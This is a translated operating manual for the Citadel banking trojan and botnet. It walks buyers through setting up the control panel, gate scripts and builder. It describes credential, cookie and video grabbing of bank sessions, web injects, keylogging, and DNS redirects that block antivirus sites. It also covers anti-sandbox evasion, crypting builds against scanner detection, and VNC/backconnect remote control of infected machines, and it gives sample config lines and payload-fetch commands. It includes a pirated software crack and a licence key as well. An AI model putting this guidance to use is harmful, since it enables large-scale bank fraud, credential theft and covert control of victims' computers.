Citadel Version 1.3.5.1 Rain Edition Manual

Citadel Version 1.3.5.1 Rain Edition Manual
 
This is the translated manual for a dangerous Botnet/Trojan. Please handle with care.
 
Manual Version: 3.0 (last updated 03/10/2012)
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
Table of contents:
1. Innovations
2. Access to the CRM and the description
3. Step-By-Step Installation Citadel
a) Requirements for the server.
b) Step 1 [Builder, right, scripts]
c) Step 2 [Additional security admin]
d) Step 3 [Parsing config]
4. Installing BackConnect Windows Server (VNC module)
5. Installing Citadel VNC Admin Interface
6. Installing chekinga Web socks (WebSocks)
7. Installing the log parser (WebParser)
8. Installing CardSwipe
9. Working with the crypt panel (Crypt Exe)
10. Installation of the system proxy (laying)
11. A brief tutorial on the new ficham admin
12. Working with API (api.php)
13. How to update the admin area and one during the next bot version of Citadel
14. Description of the options in the config Builder
15. FTP-ifreymer. Description and setting
16. Module description "Keylogger processes"
17. Modular GeoIP botnet protection
18. The module "Double-log Cleaner"
19. Web module injects (WebInjects)
20. General recommendation and FAQ
21. How to ask questions in the Jabber
22. License Agreement and Terms of Use
23. The list of commands for the bot
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
 
************************************************** ******************************
========================== >>>>> 1. The list of features and innovations Citadel:
************************************************** ******************************
[+] Fixed bug VNC on Vista / Windows 7. Now it is possible to work with the Internet Explorer 8 (remember, there was a problem with rendering IE)
[+] Support for Mozilla Firefox 7.0 (solved the problem, which did not send in reports in the latest versions of the browser)
[+] Crypto-protection (deciphering body in memory).
[+] Redirecting DNS (not via hosts). You can block / redirect any URLs, without fear that they will notice heuristics. For example AV-block or redirect server has been reconfigured bank pagu to another host.
! BONUS! List of URLs of popular anti-virus programs to block attached.
[+] Version information sotfa in reporting. Sends you a detailed version of a browser Holder with the report. It helps in simulated settings Holder.
[+] An additional level of server protection from trackers - Login Key.
[+] The mechanism autintefikatsii boot config (no direct URLs). Gives full protection from the established trackers.
[+] Support grabber Google Chrome. [Tested on the latest version of 15.x/16.x/17.x].
[+] Support injects Google Chrome. [Tested on the latest version of 15.x/16.x/17.x].
[+} Added caching of search functions, which speeds up the installation of hooks Chrome.
[+] Added ability to execute system commands CMD at the start of the bot (section CMDList) sending a report to the server. For example, you need to at installitsja, sends the results to the command "ipconfig / all", or a list of all the ball. Advantageously, the analysis of the internal structure of companies. (For example, often come across bots in LAN with the names ACCOUNTANT_PC, POS_SERV, DATABASE ...)
[+] Added a mechanism to verify the safety hooks on some Windows.
[+] Heuristic analysis environment with a stop for a sheet of unwanted software (significantly increases the stealth), including all popular anti-virus software.
[+] Fixed some minor bugs.
[+] Video grabber. A unique opportunity to follow the work of your injects "Holder's eyes" in the config file specifies a list of sites and the length of recording video in seconds, when coming to a given link is activated video recording format. Mkv. It is recommended to configure your server to receive files 10-60MB.
[+] Removed the deletion of cookies when installs, considering it knocks "fingerprint" when working with Holder bays.
[+] Added support for HTTP 1.0 and Extended Header (eg responz does not always look like "HTTP/1.1 200 OK", is "HTTP/1.1 200 follow document", in this case, after the code is 200 more words) applies to browsers Firexfox & Chrome
[+] Added a gate generator (in case you want to put the files on an intermediate host for a round-trip).
[+] Completely redone encryption (data transmission, recording logs / video, download the config, etc.) in the Citadel, to replace the outdated RC4 used in Zeus, came to AES 128. Let me remind you that the RC4 gave asechku when mass was started decryptors different configs / injects to Zeus, while hosts started palitsya in abuse.ch.
Now, in addition to the built-RC4, which is encrypted with your personal signature in software and embedded AES encryption, the output we get secure AES128 appeal bot <-> gate. No ZeusDecryptor'y (ThreatExpert) and Automation of reversing will not be a hindrance to your comfortable working at the moment (Jan 2012).
[+] All the basic functions of the remainder of Zeus present. I do not need to write it again.
[+] Fixed bug in recording reportov web filters in the config file with the "!" (Neglect), which was to exclude all the specified references, and instead do the opposite and write to a log.
[+] Added new option to filter-config-file, namely the function to send or not to send cookies to the server.
Option static config disable_cookies 0/1 indicating whether to disable grabbing cookies (1 - disable, 0 - turn).
Manually, too, can be obtained using cookies user_cookies_get from admin, if you really need them.
[+] Added the function of any open page deflotovym user's browser on the boat.
For example, if you want to cheat any counter or voting statistics or want to hear from your dop.dohod botnet opening pages shopami (also: pharma, gambling, drop-projects, etc..) Is a great way to advertise the required Page!
New parameter url_open <url>
[+] A new kind of filtering WebFilters in the configuration file for the assembly.
Two new parameters: P and G.
P parameter specified before the link points to a record only POST requests (all others are ignored) from this link.
G parameter specifies the recording only GET requests (all others are ignored) with the given link.
Parameters can not be combined, ie should indicate any one of them.
[+] Added a modular software system, which gives us:
* Scalability and download any operational functionality bots oriented to Citadel.
All modules are loaded from the server and dynamically decompressed in memory, eliminating the detection.
Storage and transfer to the outside world only in encrypted form.
The modules are loaded into the target protsessse so weighty save memory.
Extensive Administration - Modules can be turned off through a config.
[+] Video Grabber redone on a modular basis. Now the weight nekriptovannogo build <190 kb. Always.
[+] Added new option timer_modules (timings for loading modules).
[+] Added support for the new browser Google Chrome 17 and also fixed a bug with handling Flash'a in it.
[+] Added support for macros. Introduced macros:% BOTID%,% BOTNET%
* Can be inserted into any part injects data macros, and upload to your server (AZ / INJECT) is transmitted to the bot name and the name of a botnet.
[+] Added 4 teams control modules (on / off, disable / enable the download).
[+] Added new option disable_httpgrabber 1/0 for Chrome: eliminates the conventional processing HTTP (not HTTPS) requests.
[+] Added a full record in the User-Agent reports HTTP (S) grabber allows to clone holdersky UserAgent through any type of utility CCTools.
[+] Added entry screen resolution in reports HTTP (S) grabber, an example of "Screen (w: h): 1600:900" - useful when cloning options Holder, many banks are paying attention to this.
[+] Changed the protocol to send video files to reduce load on the server (some had problems with the load on the server and it is strongly inhibited)
[+] Added ability to send jabber-notifications to multiple recipients in the admin Citadel.
[+] Added the ability to specify multiple url_config'ov (the path to the main config file), used to be this: if you have the basic configuration is not available at the time installs a bot, the backup does not download, now the problem is not trying to pull the boat and the other config URL'a (You can enter up to 3 backup).
[+] Fixed bug in Google Chrome (17x) leads to a sub-hang, when you open multiple tabs with injects.
[+] Added new command:
- Get information about the installed software (list - the company | product | version) on your computer: info_get_firewall
- Get information about antivirus installed on your computer: info_get_antivirus
- Get information about the installed firewall on your computer: info_get_firewall
The information comes in the form of a separate report for each bot. Soon embed mass Statistics installed software to the admin Citadel.
[+] The algorithm for a number of anti-emulation techniques AB (not considered kriptor software became invisible for several proaktivok).
[+] Fixed problem running under the user SYSTEM.
[+] Added Jabber-specific notifications when it detects the specified bots wildcard (eg. mask * corporate *, will look botid with such a coincidence), even if they did not send any log files, the script will notify you in Jabber-informed about the appearance of the bot . Now you do not miss out past the eyes of bots.
[+] In the admin has a new section "Efficacy and Safety", we spent the integration with the service scan4you, and you can now just one click away to check all of your exe builds on palevnost once in the admin Citadel, also, you can set up automatic file scan times day, and if one of your files scorched more than a third anti-virus, you will immediately receive a notification in your Jabber, so you can
immediately replace the exe. Now, the mechanism will work for you automatically lazy to your health!
[+] Some customers have complained about the fact that only 40% of the bots is updated to the new version exe, others can not upgrade for some unknown reason. Indeed, the bug remained since Zeus, we have investigated and corrected it. Now, a new parameter in config: timer_autoupdate 8
Wherein the predetermined time (in hours), as is often downloaded exe and restart the server (RC4 key must be the same). 80% of the bots are now updated successfully, and the crypt of perezalivat exe, survivability increased by 37.1%, your bots will have a very fresh and clean build.
[+] Reworked system to send reports to a server in previous versions for each report took place the unit sending a POST request to the gate, in the new scheme reports are sent a pack on a few pieces, it allows us to reduce to a minimum the number of sessions on the server and the load on the server is minimal, to withstand a large number of bots online.
[+] Video format from bots changed to. Webm (HTML5), we have built online video player to the admin Citadel, now you can watch the video directly to your brauezere (recommended Opera). Of the features: Fast назад-вперед/фулл-скрин/поиск video BotID, IP-address, date.
But this is not enough and we went on a lot of you are using (it's time to use all of the industry and to develop jointly) of AZ and personal admin for injects / collection akkov etc. Would you like from your admin area to watch over the bay or how your inzhekt on the boat? It's Easy! We have created a system API-now you can pass BotID or IP-address of the script, and the API will return you a ready-made HTML-embed code of video on the bot and you can insert and watch the video at least for narod.ru, without going into the admin Citadel.
[+] Added a convenient analyzer parser system commands (CMDList) in the admin panel, you can now see the new format as a table, the results of executing system commands, such as: ipconfig, a list of PCs in the local network, a list of processes, etc.
[+] Now when installing build on the bot automatically lump sum is sent to the admin cleduschaya information: installed firewalls, anti-virus software installed, installed programs.
You can view information for a single bot, and for the entire botnet. We have created a separate section where you can see all the statistics in the form of visual graphics and calculations. Now you know who to fight.
[+] Added "Favorites Log" you can mark any interesting account (account) when searching for data in the admin and then easily find it unnecessarily it will be allocated a different color.
[+] Implemented injects compatible with UTF-8 (now inject, you can insert any languages ​​such as Japanese, Chinese, etc.)
[+] Developed a crypt in the admin panel Citadel. This is a section in the admin panel that allows you to update exe file bots, straight from the web. At any time, you can redownload the right exe file and bots will download it in a timely manner. Is the history of downloads in the format: File | Date Downloads | Paid (Y / N)
On the latter point, we have divided the powers and created a separate category of users with "kripter" - These users have access to your panel as you wish and the only privilege the users - the ability to update exe file, which you can celebrate in the table, paid concrete crypt or not.
You can turn on jabber-notification to the check result on scan4you.
[+] Adding full-screen screenshots (option in the config - "@ @").
[+] Improved mechanism avtoapdeytinga: If you encounter a problem with a heavy load on the server when updating (or bots do not move to the new admin panel), this fix corrects this situation. Fix includes:
- Old REPORTS from the previous version are removed during the upgrade exe (tmp file), an additional safety net.
- Heavy Records (video and other file REPORTS) are also tested for correctness and are removed in case of problems (for example, if the file already downloaded)
- Changed the initialization apdeytinga, resulting isklchyuchen deadloc and the possibility of further updates when a file system error.
[+] Fix the problem of garbage in the admin logs: removed the complete logging of Flash-movies (swf / flv) from logs and all Facebook, because a huge amount of trash talking from them.
[+] Module "Quality inspection WebSocks" is now integrated into the admin area, no extra scripts. Shows: country, state, city, hostname, uptime and ping lag.
The ability to enter into this section without a password, for convenience when needed urgently Sox smile.gif
[+] The module "log parser" is now integrated into the admin area, no extra scripts. The interface is much improved, added the ability to create a "chosen domain", "archive logs" and the ability to parse http or https domains to choose from. Builds a visual table of all the domains that appear in the logs.
[+] Added "Notes" in the admin area of ​​Citadel, a bit of online notebook. Adapted the admin interface for the tablet iPad / Galaxy Tab.
[+] Improved module "VNC-admin panel", now it is integrated directly into the admin Citadel, any additional scripts. All set to 1 click. Many new features, namely:
- Ability to work with the API, you pass BotID or IP-address of the script, for example through inject, and it sets the VNC / BackConnect Socks-connection by sending data to connect you with Jabber. Script can call at any time, applies to AD.
- In front of each report in the "Search the database" appeared four buttons: "Add to Favorites", "Connect VNC", "Connect BC Socks", "Autoconnect VNC", "Autoconnect BC SOCKS"
- AutoConnect VNC option is selected and the bot will install vnc-connection at each outlet online, unless you disable it.
- AutoConnect BC Socks with this option enabled, the bot will set backconnect socks connection at each outlet online, the other option is creating a one-off connection.
- Ability to automatically create VNC / BC SOCKS-connection as soon as the robot came from the account you want for URL-mask, assorted hot cakes.
- Next to each account on the URL-mask is written the date of the last entry in this acc (last login), now you do not have accounts on the activity of the check - for you it will make scripts.
- The possibility of any notices in several Jabber'ov immediately.
[+] Fixed problem with chain hooks in Chrome.
[+] When you start user_execute with the flag "-f" be forced to operate only apdeytinga exe and will not be started as the installer.
[+] Optimized gate, thus reducing the load. Simplified installer admin job that allows you to install all the modules in 1 click.
[+] Added support for the new version of Chrome 18 [Inject / formgrabbing]
[+] Added button "All reports bot" in the admin panel, you can view the start and end of the reporting on the specific bot.
[+] Fixed bug with manual command dns_filter_add, blocking URLs now works correctly.
[+] Fixed bug with display of exe files on the main page, now deleted exe disappear automatically.
[+] Fixed a bug with the work of the Task Scheduler scan4you, daily check exe file is correct.
[+] Added a single system CRON-job, one cron-job now manages all the tasks: jabber-notice inspection files, work units, etc.
[+] Added ability to delete videos from the admin area.
[+] Added a reference to the boat in the notes to the VNC-Jabber module.
[+] Updated GeoIP database (end of 2011).
[+] The last domain of AdvancedConfigs triggered a delay is meant to protect your backup from URLs automatically grabbing Honeypot.
[+] Fixed the script in the zip archive data in the admin (fsarc.php)
[+] Settings Jabber-account and all settings are now rendered in the general settings.
[+] Now you can specify the path to the config file with httpS :/ / (unsigned certificates are held)
[+] Fixed bug with case-sensitivity to inject, and now <BODY> <body> same entity. All injects insensitive.
[+] Completely changed the web admin interface, user-friendly.
[+] Added online viewing of screenshots from the admin area. Screens are lined up in order of appearance, easy to switch back and forth keys are sorted. It makes no sense to download more images and look for one. Virtual keyboards / page shows consistently.
[+] Added otstuk history, you can see the statistics of your otstuk botnet (active, total, percentage) for a week, two weeks or a month.
[+] Added a version history of software, you can view the statistics for updates in your Citadel botnet. Will know how many bots moved to the new version, and how much is left on the old one. Draw a diagram.
[+] Ability to search logs only for bots that are online.
[+] Ability to search logs for several keyword is right, and you can save them as an alias and not enter again when you next search, just select from the list.
[+] Added button "Cookies" in the context menu for bots, which allows you to quickly display all Cookies bot, if you do not shut off. Saves time.
[+] Integrated export function FTP-accounts in the API, useful if you are using third-party software class FTP-Iframer, allows us to derive a plain-text/xml/php format ftp-acca on the desired date.
[+] Added button "Whois" to view the report, allows one-click to get all the information on the IP-address of the report.
[+] Added a comment to the boat when viewing the report, as well as the time when the boat was last online.
[+] The new section "Selected Records", which allows you to save a quick link to the required report + nimu comment. For example, if you come across an interesting account, click "Add to Favorites" and the report will be displayed in a separate section, with automatic Whois'om data and your comment. Keep acca on the spot.
[+] Added antiemulyator that allows you to protect your botnet by reversing and falling into the trackers. When you start, build a detective that he was running in a virtual machine or sandbox CWSandbox, VMware, Virtualbox, Sandbox, he begins to behave differently and your botnet go unnoticed. Details were not disclosed, unnecessarily announcement is pablike and technology is very tricky.
Of the minuses: can not test work in Vmware, have to do it on a real PC or Dedik. The option is moved to the config. antiemulation_enable 0/1
[+] Added the display of the status of the bot "Online / Offline" when viewing the report.
[+] One of the most important Fitch: previewing a report when searching logs. No need to open 200 more browser windows to view each report and each link. You can now easily by clicking on one report make the preview, and if the report will be of interest, then view the full version.
Supported by a rapid switching between reports the keys back and forth-ESC.
[+] Updated script cronjob cleanup of old scripts (commands). Now we all have to work without bugs.
[+] Added a context menu option "bot Screenshots"
[+] Module VNC-admin: added sorting by date last connection / OS (for example, if you only need to WinXP).
[+] Module log parser: Added sorting domain / number of reports in descending order.
[+] Module FTP-ifreymer: Fixed a bug with the "smart" ifreymingom when quoted in the iframe-code escaped. The current owners are advised perezalit script pad.
[+] As a previous encryption algorithm has been cracked after a few months because of this, some customers got in ZeusTracker. We have developed and implemented a new encryption algorithm based on a modified RC4. In the router uses a special key known only to the client. which requires its presence to decrypt. Because each client's own indvidualnoy key, now from one client will not suffer the rest. If you hit one, the other will be protected from this. Now we are completely isolated from the automatic analysis builds. As a result, we obtain authorization level 2-bot protection from trackers.
[+] Did cropping options X-Frame-Options in Header'ah as in it may interfere with some inject into work.
[+] Did a lot of work to correct formgrabbinga / inzhektinga in Chrome 19 (19.0.1084.52m)
[+] Works faster on large botnets admin.interfeysa + gate expense of functional optimization GeoIP-database.
[+] Did a quick check on the bots Online-status list to main page.
[+] Ability to add bot in the "Favorites" without reporting.
[+] Made detection of privileges in the system (admin / user), is displayed in the "Information about the bot - Flags"
[+] Sort by date screenshots.
[+] Added ability to connect to other databases Citadel (both distant and old / disabled admin) to search for reports.
[+] Expand your search in the database: you can specify the stop words, such as twitter.com, which will be out in the issuance of the results, so as not to clutter up the logs debris. Also, you can not specify a search through the content of the report, and on the URL Mask, it increases the speed of data retrieval.
[+] Extended Jabber notifier added events following items:
- Masks BotID the event "Boat came in Online"
- Notification when an individual software from the "installed software"
- Mask CMD contents of the report.
- Parallel convenient entry in log-file of all events, in addition to Jabber-notifications.
[+] Added a free module of grabbing cookies in Firefox, exports all the cookies from the browser and sends you.
[+] Fixed bug deleting records.
[+] Auto Update Statistics home page.
[+] Button [Decode] on the reports, which can decode urlencode (% 0D) sequence in a convenient form.
[+] Added ability to determine the online / offline status of the bot in the API.
[+] Completely redesigned algorithm to test the module WebSocks.
[+] Show scripts (commands) page by page.
[+] Added ability to send messages to jabber through api.php (uses your personal settings in the admin)
[+] Now, each HTTP / HTTPS report added cookies (Firefox / IE), and headings:
[+] Completely redesigned internal encryption algorithm otstuk many times higher, longer durability. To migrate to the new version of the bot, run the command user_execute http://www.host.com/1351.exe. RC4 key must be the same.
[+] Adjust Browser Keylogger'a. Space is automatically added if after the last key press was 5 seconds, you need to visually separate input-fields.
[+] Trouble with 302 redirects when inject did not work if the items are linked via javascript.
[+] Plaintext logs will open in a new tab.
[+] Fixed bug loss bots from online when the GeoIP.
[+] Display the comment to the boat in the VNC-module by the mouse, as well as sending a comment to jabber with information about the connection notices.
[+] Ability to specify in DnsFilters mask with an asterisk (*), make the mask more flexible.
[+] WebInjects. The module is designed for easy interaction with the holders through technology injects into browsers. The module allows you to inject progruz any specific BotID, country or botnet in just a few minutes, without having to edit the config. Everything works through the admin panel.
A brief educational program:
In the config bot section DynamicConfig, fit parameter url_webinjects "http://www.host.com/file.php" (way to file.php). Boat pulls this file every 2 minutes, taking out a pack injects, which gives the distribution system injects issue.
In section 2, there VebInzhekty sections: "The group vebinzhektov" and "Paki", the first is the structure of "Group - INJECT - Members (admitted to the group)," and is responsible for managing all INJECT. The second section is responsible for setting the spread injects (how bots deliver inject and how much).
In the main menu, vrazdele "Users" to create a new user has rights "r_botnet_webinjects_coder" is a user who can manage the group, which will appoint an administrator privileges. In other words, if you make a developer injects into the admin account and create it, it will have the right to create and edit their inject them, others inject it does not see, only the list injects his own band. Ie, you can create groups of 5 and a 5-inject coders, so each person is responsible for his group (set injects). You see the statistics of what happens in the overall system and can unites all groups injects into one "pack", which will be progruzhen any and all bots, or a single category of bots by class: the country or botnet.
In the admin created a special easy visual editor with syntax highlighting injects. The format is fully compatible with zevsoformatom.
Sushestvuet several modes for packs.
Dual - when running file inject from the main config + vebinzhekty.
Single - when only vebinzhekty, and the local file injects off.
Disabled - when vebinzhekty disabled and the local file with an injector works.
If by chance there was a mistake somewhere in the INJECT, the vebinzhekty not get together and you come DEBUG-report with information which pack (bundle) was not collected.
According to the information on the bot, you can see the history of injection test web injects, too, can look DEBUG-bot reports and look at the history and compilation errors vebinzhektov.
If the bot receives several packs (bundles) where different modes of operation: dual, single, disabled then all of Bandlov automatically selected the most "narrow mode" work, such as single.
Boat constantly checks for updates of any of vebinzhektov, and if so, it updates it for himself.
[+] Option in the config disable_httpgrabber is extended to completely get rid of HTTP-reports, sending to the server HTTPS-only reports on all browsers, when set to "1". Get rid of unnecessary load on the server.
[+] Added the section "HttpVipUrls" in WebFilters, which allows you to add links-exclusion (http://) in the absence of HTTP-grabbing (disable_httpgrabber 1).
-------------------------------------------------- --------------------------
To simplify the information, you can skip to the section
Which describes the installation and use of the modules you do not acquire
USE CTRL + F to search for keywords and definitions.
-------------------------------------------------- --------------------------
************************************************** ******************************
========================== >>>>> 2. Access to the CRM and the description
************************************************** ******************************
We provide personal account information to Jabber.
What is Citadel CRM Store?
It is the system of interaction between our clients and the developer.
Perhaps you know the situation when a support product ignore your requests in icq / jabber 'e - this contributes to the high loading the person who is responsible for this, because a lot of clients, and he alone, but still busy with chores.
Especially for you developed a system through which you can immediately report a bug in the software, and we in turn it fixed a, if any. All requests go to multiple people at the same time, with notifications by jabber / sms. You quickly get an answer within the ticket system.
I've experienced a great idea for completion of software and want to share it with the developer (even if it is even the smallest idea: for example, you do not like the format of the log) - we're going to meet you.
You can create two types of applications (read-projects) within the CRM:
a) public application - it's a request with the theme + description (better put TK), which will see all the customers, they can discuss it in the comments, suggest a price for the sale and vote: whether this application or send it to the trash.
You can create these types of applications, and can vote and do any act in relation to other clients' requests.
b) the private application - if you want to offer our developers indvidualnoy problem and a good price for the implementation of, this type of application is for you. It can only see the developers (ie us) and you. If all conditions are satisfied both sides, this module only get you.
All relevant applications, you can see a section labeled 'discussion'
 
The right to vote has 4 values:
- What is needed, I get
- It is useful, but I do not need
- Absolutely not needed
- I do not need, I do not acquire
If you see a new application - vote for her, even if she does not need you at all! We have a very narrow range, so it is YOUR opinion makes the difference for ALL, do not stay on the sidelines.
Any developments within the CRM (solutions, applications, comments) you will be notified by jabber-bot channel. This is done for your convenience, so you do not refresh the page every time. But still, you need to enter the CPM to follow the news and applications and to show their opinion.
The faster flow of voice and opinion - so speedily evolving product.
If the application is gaining a lot of abandoned votes, it goes to the "Rejected" and closes.
If the request is approved by developers, it goes to the "Under Construction" and we estimate the approximate timing of its implementation.
Be sure to specify the desired advertised price per module, for which you would appreciate completion.
All the news we publish in the "News" section, if you do not receive notification in Jabber, please report it immediately to our support unnecessarily you are depriving yourself of a great deal!
Come in and check back often CPM news and commentary on request.
2) A list of useful links that will help you:
1) VMWare Workstation 6.5.0 + VMWare Tools + Crack:
http://www.citadelmovement.com/software/VMware-workstation-6.5.0-118166.exe
2) The image of the English-language Windows XP SP3 (Corporate Edition):
http://www.citadelmovement.com/software/Microsoft_C2AE_Windows_XP_SP3_Corporate.iso
Key: MXDJT-W3TCG-2KGQH-YPMK3-F6CDG
3) development kit for creating injects + examples (author unknown, is taken from the forums):
http://www.citadelmovement.com/software/injects_development.zip
 
 
************************************************** ******************************
========================== >>>>> 3. Step-By-Step Installation Citadel
************************************************** ******************************
Installing Citadel
Folders:
builder - Kit Builder
backconnect - software for BackConnect VNC module, namely php scripts for Backconnect Windows server (see below).
webserver (either server [php]) - admin panel and set this to be uploaded to the server.
webserver / cp.php - file management admin panel
webserver / gate.php - the main gate to communicate with the bot
webserver / file.php - config script issue and exe files bot.
********************
>>>>>>>>>> A) Requirements for the server.
********************
PHP> 5.3, Mysql 5 (preferably the latest version, but 5.2 works too) Be sure to curl module for PHP
cron, apache. At the request of nginx and control panel cPanel or DirectAdmin.
+ Windows VPS if purchased VNC admin area (on the module below), Windows2008/2003/7 + 512 RAM and 2 GB of disk space. Processor to 1024 mhz
 
********************
>>>>>>>>>> B) Step 1 [Builder, right, scripts]
********************
When you start builder.exe, will line
Authorization key: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
This is your key to protect indvidualnoy of trackers (we call it even LOGIN KEY)
It needs to be placed in the file webserver / system / global.php, which contains the line
define ('BO_LOGIN_KEY', 'PUT_KEY_HERE');
Insert the key here, ie, it turns
define ('BO_LOGIN_KEY', 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX');
By default, this key is already inscribed in the admin area, so you just have to check it out.
Fill out the scripts folder on the server and webserver we place right on the diagram below:
Then set chmod 777 on the folder:
system
system / data
system / cron
files /
files / webinjects
Also, it is necessary to put before setting chmod 777 on the entire folder webserver, after the complete installation - to return the rights to the folder chmod 755
After these actions done, open the file whose name ends webserver / api.php
and change the line define ('API_TOKEN_KEY', 'JHGuw3e76 & ^% & $ gf232ghfgh% ^ $% ^ $%');
to any arbitrary password, eg define ('API_TOKEN_KEY', 'dgwd23gwegw');
It is necessary that you are protected from hacking and you have not compromised through script API, deflotovy change your password.
Also, for security reasons, it makes sense to rename the script cp.php (this is a file management admin panel) and gate.php (gateway)
File file.php not rename!
********************
>>>>>>>>>> C) Step 2 [Additional security admin]
********************
Go to http://www.htaccesstools.com/htpasswd-generator/
We enter the desired name, password, issued to strings like a: $ apr1 $ HE / llFvK $ u3YAEGm277SkotywpTl9w /
Save this line in the. Htpasswd file in a directory webserver
After that, create a new. Htaccess file in the directory webserver
There write:
<Files Cp.php>
AuthName "Your ID"
AuthType Basic
AuthUserFile / put / do / faila / .htpasswd
require valid-user
</ Files>
Where / put / do / faila / .htpasswd - is replaced by a final unix-way.
Now when entering the admin cp.php, additional protection is a pair of login and password.
You can do it differently and do not create. Htpasswd, and just create. Htaccess file and write there the lines:
<Files Cp.php>
Order Deny, Allow
Deny from all
Allow from 111.111.106.111
</ Files>
Where 111.111.106.111 - your permanent IP, now the admin panel will be available only from your IP.
Which method you prefer - you choose.
********************
>>>>>>>>>> G) Step 3 [Parsing config]
********************
Open the file config.txt and consider the new settings, the old settings inherited from Zeus remained unchanged, so we will not harp on them. If you have not used by Zeus, download pablik releases Zeus and study settings yourself. The product is targeted at what you used before Zeus'om.
entry "Video"
quality 1
length 60
end
Section for setting videograbbera: length length of each video in seconds, you should use no more than 10 minutes (600 seconds) unnecessarily formed a very hefty files.
Quality - from 1 to 5, the video quality. It is recommended to leave the default one, to save on the amount of video files.
Video recording is triggered when entering the desired link and we removed exactly length-seconds.
We need to set the mask for the shoot, go to the section entry "WebFilters"
"# * Paypal.com / *"
 
# symbol in front of the mask is a symbol of the activation of shooting.
 
The section is very thin because it is quite heavy load on server files, you can specify a precise mask, and only on a very desired link (for example bank.akki)
It is recommended to configure the server apache & php - to receive files over 50 MB via POST.
Guide to setting up a server is here # http://jdownloads.ru/faq/8-how-uploadbigfiles.html
Test carefully shooting video than virtual machines, unnecessarily due to lack of correct ones, can be such that virtualke will not shoot video.
Videos are added to the format. Webm, a folder _reports / * BOTNAME * / videos /
They can be found by searching the files in the admin area, or browse through the online player (the "View Video"). Encouraged to browse in Opera and Firefox, other browsers have not been tested.
entry "CmdList"
"Hostname"
"Net view"
"Ipconfig / all"
end
 
A list of system commands that the bot will execute the first run on the system and send the admin area.
In the admin, you can find the instructions as a result of the type of report "The result of CMD-Team"
With him will be the list: bot - the result of the command
in a convenient format (Section CMD-parser)
encryption_key "key"
Be sure to ask here a random key, this key is also known as RC4 Encryption Key - you ask him when you install the admin with the uninstaller, you can change it in Settings. It should not be too difficult or too easy, the same as in the config file and the admin. Not recommended to put up to 10 characters! USE TOLKONIZHNY case and the special characters!
 
entry "DnsFilters"
"Microsoft.com = 127.0.0.1"
"Myspace.com = 127.0.0.1"
"Gruposantander.es = 127.0.0.1"
end
Ability to create a DNS-redirect or block the AV-server or unwanted url (for example, if you find that the logs are downloading someone else and you want to block someone's gate).
Specifies the IP-address for the redirect.
DNS Redirection works not only for browsers, but for all software, which will be knocking on the given domain. All of these requests will be redirected to another IP.
The mask can be specified precisely, or use an asterisk (*) to indicate the approximate mask, for example:
entry "DnsFilters"
* Bitdefender.com * = 209.85.229.104
* Download.bitdefender.com * = 209.85.229.104
end
Once you have edited the configuration to fit your settings, click Knop collect configuration, collect and create a bot modules.
Button gather bot is responsible for generating exe file and reads the section of StaticConfig
Button collect configuration is responsible for generating a file with an injector, as well as a section DynamicConfig.
Button assemble modules creates a file and the file module video.modulya grabbing cookies Firefox.
Modules such as: MiniAv, Cardswipe built into the exe file and do not create any additional files.
All received files to upload to the directory webserver / files
Do not forget to zakriptovany exe file before you put it in a folder, otherwise it will be such that the timer auto-update, bots will download an exe that scorched.
Video.modul upload mandatory, even if you're not using it. Also, you can not upload exe file if you do not want to auto-update exe with parameter timer_autoupdate.
url_config1 "http://localhost/file.php|file=test_config.bin"
Specify here test_config.bin - the name of our config, we have filled in the folder files /, given that specify the path to the file.php (as it lies above the folder files). | Character you should not confuse it there on purpose.
Expansion of the config can be any.
 
url_config1 must be specified, you can also enter multiple backup config URLs in case any of the chain domains at startup exe does not work, because the patched bots are not tapped into your admin area, if not be able to download the main configuration file.
In this case, write another line under url_config1:
 
url_config2 "http://localhost/file.php|file=test_config.bin"
Is optional. But these can be specified up to 3 backup configs, the bot will turn to knock on each of the URLs is not set yourself a config file. At the very last url_config bot knocking delayed 5 hours, it is to prevent automatic parsing of URLs reverser.
Note that this option is not the task of the Reserve, as a safety net in case you when you first start the exe build, some of the three domains is not available. To back there is a separate section below "AdvancedConfigs"
 
 
url_loader "http://localhost/file.php|file=test_bot.exe"
test_bot.exe - This specifies the name of the exe file, which is in the folder files /
File.php can not rename the file, subject to the same name. Specify the path Till file.php.
 
url_server "http://localhost/gate.php"
It points the way to the gate - gate.php
The rest is set up as Zeus, if you forget the format, read the manual of Zeus zeus_old.txt
 
Once we uploaded the files in the files and have filled an entire folder as a whole created a webserver + DB.
We go to the address: http://www.vash-host.com/webserver/install
The name of the folder on the webserver can rename arbitrary.
And we enter all the values ​​(DB, passwords, RC4 key) and then delete the directory install.
 
 
 
************************************************** ******************************
========================== >>>>> 4. Installing BackConnect Windows Server (VNC module)
************************************************** ******************************
To install the server side, you need a Windows VPS / Dedicated desirable XP, 2003,2008
We put the web server XAMPP / WAMP / Apache c support for PHP. Turning off UAC + Windows Firewall, so you can open ports. And also disable the policy domain and leave completely from any domain.
Fill in the web directory scripts set backconnect \ winserv_php_gate
Web admin panel connector will be at: http://ip-serv/control.html
It will log on VNC / Backconnect Socks Connect.
Possible problems: because Windows firewall, check out this point very carefully. Do not forget to restart Windows after disabling firewall.
All scripts must lie at the root of the server does not create any folders.
If you do not know how to install Apache with PHP, here's manual: http://www.ripecms.com/documentation/articles/installing-apache-php
************************************************** ******************************
========================== >>>>> 5. Installing Citadel VNC Admin Interface
************************************************** ******************************
If you purchased the unit VNC-admin, then your panel section will be available "VNC".
Go over the options with which it can be difficult.
To get started, you need to click the "Configuration" and write there IP-address of Windows-based servers, which you have already filled scripts backconnect'a. No way do not just IP-address.
What is different from the connection avtokonnekt?
If you specify a connection to some bot, it will execute this command one-time fee and will send you the data connection. If you ask avtokonnekt, the bot will initiate a connection to backconnect-server every time as soon as he goes on the Internet. This option applies to both Backconnect Socks, and to VNC.
Now we define a URL-masks, which we will catch our VNC admin if there is a need for this.
